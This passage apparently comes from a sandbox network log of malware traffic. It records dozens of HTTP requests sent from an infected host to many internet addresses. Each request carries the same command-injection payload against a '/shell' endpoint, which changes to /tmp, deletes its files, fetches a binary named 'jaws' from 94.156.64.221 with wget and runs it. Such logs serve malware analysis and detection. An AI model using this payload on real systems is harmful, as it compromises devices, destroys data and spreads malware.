                    Jun 1, 2024 18:15:53.240427017 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    70192.168.2.2337714206.121.1.24080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240463018 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    71192.168.2.2350218159.209.163.8680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240504980 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    72192.168.2.2354536197.114.181.20580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240540981 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    73192.168.2.2340758136.107.130.20180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240581989 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    74192.168.2.235084650.8.69.25580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240725994 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    75192.168.2.2356784162.133.179.16280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240756989 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    76192.168.2.2333210155.78.6.22780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240793943 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    77192.168.2.2340970113.32.208.23380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240843058 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    78192.168.2.2339732128.151.195.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240885973 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    79192.168.2.2333878112.152.48.880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240919113 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    80192.168.2.235355881.48.62.15280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240978003 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    81192.168.2.234649093.152.148.21980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241010904 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    82192.168.2.2345540144.192.66.23080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241044044 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    83192.168.2.235521651.180.72.22780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241077900 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    84192.168.2.2352008198.24.255.21380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241107941 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    85192.168.2.2342950160.171.210.5180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241159916 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    86192.168.2.2342926173.201.55.11580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241185904 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    87192.168.2.2332800118.131.29.17180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241218090 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    88192.168.2.23383548.194.32.20780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241256952 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    89192.168.2.2342066198.139.79.12080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241303921 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    90192.168.2.2348762191.185.132.25180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241435051 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    91192.168.2.2358476223.81.79.13280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241470098 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    92192.168.2.2354708173.142.129.18180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241503954 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    93192.168.2.235865489.243.242.22180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241528988 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    94192.168.2.234526650.235.115.10680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241575956 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    95192.168.2.235288680.252.121.4580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241606951 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    96192.168.2.234055460.55.180.7380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241651058 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    97192.168.2.234030081.78.87.6780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241698027 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    98192.168.2.2334492123.28.179.25480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241729021 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    99192.168.2.235082487.130.72.18280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241765022 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    100192.168.2.235729824.4.140.18080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241794109 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    101192.168.2.235717437.47.52.16680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.241837025 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    102192.168.2.2343646121.59.20.21580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.246793985 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    103192.168.2.2347804161.166.48.24980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.246833086 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    104192.168.2.236071618.69.98.6680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.246870041 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    105192.168.2.2340782170.90.134.8580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247003078 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    106192.168.2.235636244.214.37.11380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247035980 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    107192.168.2.234514698.220.77.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247073889 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    108192.168.2.235436648.52.58.12880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247100115 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    109192.168.2.2344808188.248.176.4980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247143984 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    110192.168.2.2343374112.217.71.23780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247237921 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    111192.168.2.234773831.117.7.1280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247267962 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    112192.168.2.233644277.156.147.380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247342110 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    113192.168.2.23447645.69.223.7380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247394085 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    114192.168.2.233842625.119.127.18980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.247443914 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    115192.168.2.235831465.91.194.13380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.209239960 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    116192.168.2.2344574168.235.31.1780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237601042 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    117192.168.2.2337034194.244.242.7080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237678051 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    118192.168.2.2354410147.89.17.14680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237719059 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    119192.168.2.236047249.81.200.20780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237773895 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    120192.168.2.2336480137.234.162.15080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237829924 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    121192.168.2.235854657.54.162.7280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237922907 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    122192.168.2.234160624.179.173.11880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237960100 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    123192.168.2.2347054213.99.204.12580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.237993002 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    124192.168.2.235574050.27.20.24180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238029957 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    125192.168.2.2355982124.0.139.3180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238074064 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    126192.168.2.236081099.170.206.20080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238117933 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    127192.168.2.2349524133.130.243.9680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238224030 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    128192.168.2.234616481.66.87.12180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238269091 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    129192.168.2.234675452.191.152.23780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238343954 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    130192.168.2.2336208147.135.44.21880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238439083 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    131192.168.2.235802659.172.71.18580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238523006 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
